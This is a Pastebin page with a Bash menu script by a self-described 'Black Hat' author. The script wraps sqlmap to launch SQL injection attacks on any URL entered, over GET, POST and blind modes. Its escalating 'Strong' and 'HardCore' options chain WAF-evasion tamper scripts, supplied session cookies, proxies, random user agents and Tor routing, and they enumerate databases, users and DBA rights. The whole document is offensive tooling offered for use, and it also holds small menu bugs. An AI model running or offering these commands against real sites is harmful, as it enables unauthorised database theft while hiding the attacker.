DarkProgrammer000

SqlMap [expert]

Jul 8th, 2021 (edited)
1,748
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 10.13 KB | None | 0 0
  1. #!/bin/bash
  2.  
  3. ######################
  4. #    APRESENTACAO    #
  5. ######################
  6.  
  7. # Apresentacao
  8. apresentacao()
  9. {
  10.     clear
  11.     printf "     \e[1;92m.-\"\"\"\"-. \e[0m\n"
  12.     printf "    \e[1;92m/        \ \e[0m\n"
  13.     printf " \e[1;77m  \e[0m\e[1;92m/_        _\ \e[0m\n"
  14.     printf "\e[1;77m  \e[0m\e[1;92m// \      / \\ \e[0m\n"
  15.     printf "\e[1;77m  \e[0m\e[1;92m|\__\    /__/ \e[0m\n"
  16.     printf "\e[1;77m  \e[0m\e[1;92m\    ||    / \e[0m\n"
  17.     printf "\e[1;77m   \e[0m\e[1;92m\        / \e[0m\n"
  18.     printf "\e[1;92m \e[0m   \e[1;92m\  __  / \e[0m\n"
  19.     printf "     \e[1;92m'.__.' \e[0m\n\n"
  20.     echo -e "\033[01;33m###################################\033[01;37m"
  21.     echo -e "\033[01;32m Desenvolvido por DarProgrammer000\033[01;37m"
  22.     echo -e "\033[01;31m Black Hat \033[01;37m"
  23.     echo -e "\033[01;33m###################################\033[01;37m"
  24.     echo ""
  25. }
  26.  
  27. #####################
  28. #    METODOS GET    #
  29. #####################
  30.  
  31. Geral_Get()
  32. {
  33.     # Comando
  34.     clear
  35.     sqlmap -u "$URL" --dbs --mobile --random-agent --batch
  36. }
  37.  
  38. Mysql_Get()
  39. {
  40.     clear
  41.     sqlmap -u "$URL" --dbs --dbms="mysql" --tamper="modsecurityzeroversioned.py" --mobile --random-agent --batch
  42. }
  43.  
  44. Cookie_Get()
  45. {
  46.     echo -e -n "\033[01;32m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  47.         read COOKIE
  48.    
  49.     # Comando
  50.     clear
  51.     sqlmap -u "$URL" --cookie="$COOKIE" --dbs --mobile --random-agent --batch
  52. }
  53.  
  54. Proxy_Get()
  55. {
  56.     echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
  57.     read PROXY
  58.  
  59.     echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
  60.     read PORTA
  61.    
  62.     # Comando
  63.     clear
  64.     sqlmap -u "$URL" --proxy="$PROXY:$PORTA" --dbs --mobile --random-agent --batch
  65. }
  66.  
  67. Advanced_Get()
  68. {
  69.     echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
  70.     read PROXY
  71.    
  72.     echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
  73.     read PORTA
  74.    
  75.     echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  76.     read COOKIE
  77.    
  78.     # Comando
  79.         clear
  80.         sqlmap -u "$URL" --cookie="$COOKIE" --proxy="$PROXY:$PORTA" --dbs --level=3 --risk=3 --current-user --current-db --is-dba --banner --mobile --random-agent --batch
  81. }
  82.  
  83. Strong_Get()
  84. {
  85.     echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  86.     read COOKIE
  87.     clear
  88.  
  89.     # Comando
  90.     sqlmap -u "$URL" --cookie="$COOKIE" --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --mobile --random-agent --batch
  91. }
  92.  
  93. Hardcore_Get()
  94. {
  95.     clear
  96.     echo -e "\033[01;36m ---------------------- \033[01;37m"
  97.     echo -e "\033[01;32m     SQLMAP HardCore    \033[01;37m"
  98.     echo -e "\033[01;34m    DarkProgrammer000   \033[01;37m"
  99.         echo -e "\033[01;36m ---------------------- \033[01;37m"
  100.         echo ""
  101.         echo -e "\033[01;31m * Extremely Dangerous (using TOR): Be Careful Crackers, Hackers, Kiddies \n\033[01;37m"
  102.         echo -e -n "\033[01;34m * Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  103.         read COOKIE
  104.  
  105.         # Comando
  106.         sqlmap -u "$URL" --cookie="$COOKIE" --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --tor --tor-type=SOCKS5 --tor-port=9150 --mobile --random-agent --batch
  107. }
  108.  
  109. ######################
  110. #    METODOS POST    #
  111. ######################
  112.  
  113. Geral_Post()
  114. {
  115.     clear
  116.     sqlmap -u "$URL" --forms --dbs --mobile --random-agent --batch
  117. }
  118.  
  119. Mysql_Post()
  120. {
  121.     clear
  122.     sqlmap -u "$URL" --forms --dbs --dbms="mysql" --tamper="modsecurityzeroversioned.py" --mobile --random-agent --batch
  123. }
  124.  
  125. Cookie_Post()
  126. {
  127.     echo ""
  128.     echo -e -n "-\033[01;32m + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  129.     read COOKIE
  130.    
  131.     # Comando
  132.     clear
  133.     sqlmap -u "$URL" --cookie="$COOKIE" --forms --dbs --mobile --random-agent --batch
  134. }
  135.  
  136. Proxy_Post()
  137. {
  138.     echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
  139.     read PROXY
  140.  
  141.     echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
  142.     read PORTA
  143.    
  144.         # Comando
  145.         clear
  146.         sqlmap -u "$URL" --proxy="$PROXY:$PORTA" --forms --dbs --mobile --random-agent --batch
  147. }
  148.  
  149. Advanced_Post()
  150. {
  151.     echo -e -n "\033[01;32m\n + Proxy (Ex: http://211.252.169.8): \033[00;37m"
  152.     read PROXY
  153.    
  154.         echo -e -n "\033[01;33m\n + Porta (Ex: 8080): \033[00;37m"
  155.     read PORTA
  156.    
  157.         echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  158.     read COOKIE
  159.  
  160.     # Comando
  161.     clear
  162.     sqlmap -u "$URL" --cookie="$COOKIE" --proxy="$PROXY:$PORTA" --forms --dbs --level=3 --risk=3 --current-user --current-db --is-dba --banner --mobile --random-agent --batch
  163. }
  164.  
  165. Strong_Post()
  166. {
  167.     echo -e -n "\033[01;34m\n + Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  168.     read COOKIE
  169.     clear
  170.  
  171.     # Comando
  172.     sqlmap -u "$URL" --cookie="$COOKIE" --forms --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --mobile --random-agent --batch
  173. }
  174.  
  175. Hardcore_Post()
  176. {
  177.     clear
  178.     echo -e "\033[01;36m ---------------------- \033[01;37m"
  179.     echo -e "\033[01;32m     SQLMAP HardCore    \033[01;37m"
  180.     echo -e "\033[01;34m    DarkProgrammer000   \033[01;37m"
  181.     echo -e "\033[01;36m ---------------------- \033[01;37m"
  182.     echo ""
  183.         echo -e "\033[01;31m * Extremely Dangerous: Be Careful Crackers, Hackers, Kiddies \n\033[01;37m"
  184.         echo -e -n "\033[01;34m Cookie (Ex: security=low; PHPSESSID=6kv67sr4tl2ib88io1rf3glsq0): \033[00;37m"
  185.         read COOKIE
  186.  
  187.     # Comando
  188.         sqlmap -u "$URL" --cookie="$COOKIE" --forms --dbs --is-dba --banner --current-db --current-user --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --tor --tor-type=SOCKS5 --tor-port=9150 --mobile --random-agent --batch
  189. }
  190.  
  191. ######################
  192. #    METODO BLIND    #
  193. ######################
  194.  
  195. Blind()
  196. {
  197.     apresentacao
  198.     echo -e "\033[01;32m * Existe arquivo header.txt  \033[00;37m"
  199.     echo -e "\033[01;32m [1] Sim                    \033[00;37m"
  200.     echo -e "\033[01;32m [2] Nao                    \033[00;37m"
  201.     echo ""
  202.  
  203.     # Entrada de dados
  204.     echo -e -n "\033[01;37m + Opc: \033[00;37m"
  205.     read OPC
  206.     echo ""
  207.    
  208.     # Estrutura de escolha
  209.     case $OPC in
  210.     1)
  211.         sqlmap -r header.txt --dbs --is-dba --banner --current-db --current-user --dbms="" --parse-errors --safe-url=2 --safe-freq=3 --risk=3 --level=3 --threads=10 --no-cast --technique=BEUSQT --tamper="unmagicquotes.py,between.py,charencode.py" --delay=1 --timeout=15 --retries=2 --keep-alive --batch
  212.         ;;
  213.  
  214.     2)
  215.         # Criacao de arquivo
  216.             echo > header.txt
  217.  
  218.             # Chamada de Terminal
  219.             gnome-terminal -- vi header.txt
  220.             ;;
  221.     *)
  222.             ;;
  223.  
  224.     esac
  225. }
  226.  
  227. #################################
  228. #          ATAQUES GET          #
  229. #################################
  230.  
  231. Ataques_Get()
  232. {
  233.     # Apresentacao
  234.     apresentacao
  235.     echo -e "\033[01;31m [1] Geral         \033[00;37m"
  236.     echo -e "\033[01;32m [2] Banco [mysql] \033[00;37m"
  237.     echo -e "\033[01;33m [3] Cookie        \033[00;37m"
  238.     echo -e "\033[01;34m [4] Proxy         \033[00;37m"
  239.     echo -e "\033[01;35m [5] Advanced      \033[00;37m"
  240.     echo -e "\033[01;36m [6] Strong        \033[00;37m"
  241.     echo -e "\033[01;31m [7] HardCore      \033[00;37m"
  242.     echo ""
  243.  
  244.     # Entrada de dados
  245.     echo -e -n "\033[01;37m + Opc: \033[00;37m"
  246.     read OPC
  247.    
  248.     # Estrutura de decisao
  249.     if (($OPC==8))
  250.     then
  251.        
  252.         # Chamada de metodo
  253.         Blind_Get
  254.    
  255.     else
  256.  
  257.         echo -e -n "\033[01;37m\n + Url: \033[00;37m"
  258.         read URL
  259.  
  260.         # Estrutura de escolha
  261.         case $OPC in
  262.         1)
  263.             Geral_Get
  264.             ;;
  265.    
  266.         2)
  267.             Mysql_Get
  268.             ;;
  269.        
  270.         3)
  271.             Cookie_Get
  272.             ;;
  273.    
  274.         4)
  275.             Proxy_Get
  276.             ;;
  277.    
  278.         5)
  279.             Advanced_Get
  280.             ;;
  281.  
  282.         6)
  283.             Strong_Get
  284.             ;;
  285.  
  286.         7)
  287.             Hardcore_Get
  288.             ;;
  289.    
  290.         *)
  291.             ;;
  292.  
  293.         esac
  294.     fi
  295. }
  296.  
  297. ##################################
  298. #          ATAQUES POST          #
  299. ##################################
  300.  
  301. # POST
  302. Ataques_Post()
  303. {
  304.     # Apresentacao
  305.     apresentacao
  306.     echo -e "\033[01;32m [1] Geral         \033[00;37m"
  307.     echo -e "\033[01;33m [2] Banco [mysql] \033[00;37m"
  308.     echo -e "\033[01;34m [3] Cookie        \033[00;37m"
  309.     echo -e "\033[01;35m [4] Proxy         \033[00;37m"
  310.     echo -e "\033[01;36m [5] Advanced      \033[00;37m"
  311.     echo -e "\033[01;32m [6] Strong        \033[00;37m"
  312.     echo -e "\033[01;31m [7] HardCore      \033[00;37m"
  313.    
  314.     # Entrada de dados
  315.     echo -e -n "\033[01;37m\n + Opc: \033[00;37m"
  316.     read OPC
  317.     echo -e -n "\033[01;37m\n + Url: \033[00;37m"
  318.     read URL
  319.  
  320.     # Estrutura de escolha
  321.     case $OPC in
  322.    
  323.     1) Geral_Post;;    
  324.         2) Mysql_Post;;
  325.     3) Proxy_Post;;
  326.         4) Cookie_Post;;    
  327.         5) Advanced_Post;;
  328.         6) Strong_Post;;
  329.         7) Hardcore_Post;;
  330.         *) ;;
  331.  
  332.     esac
  333. }
  334.  
  335. ##############
  336. #    MENU    #
  337. ##############
  338.  
  339. # Apresentacao
  340. apresentacao
  341. echo -e "\033[01;31m # Metodos de ataques: \033[00;37m"
  342. echo -e "\033[01;32m [1] GET               \033[00;37m"
  343. echo -e "\033[01;33m [2] POST              \033[00;37m"
  344. echo -e "\033[01;34m [3] BLIND         \033[00;37m"
  345. echo ""
  346.  
  347. # Entrada de dados
  348. echo -e -n "\033[01;37m + Opc: \033[00;37m"
  349. read atq
  350. echo ""
  351.  
  352. # Estrutura de decisao
  353. if (($atq==1))
  354. then
  355.     # Chamada de metodo
  356.     Ataques_Get
  357.  
  358. elif (($atq==2))
  359. then
  360.     # Chamada de metodo
  361.     Ataques_Post
  362.  
  363. elif (($atq==3))
  364. then
  365.     # Chamada de metodo
  366.     Blind
  367. fi
  368.  
  369. #echo ""
  370. #read -p "[ENTER]"
Add Comment
Please, Sign In to add comment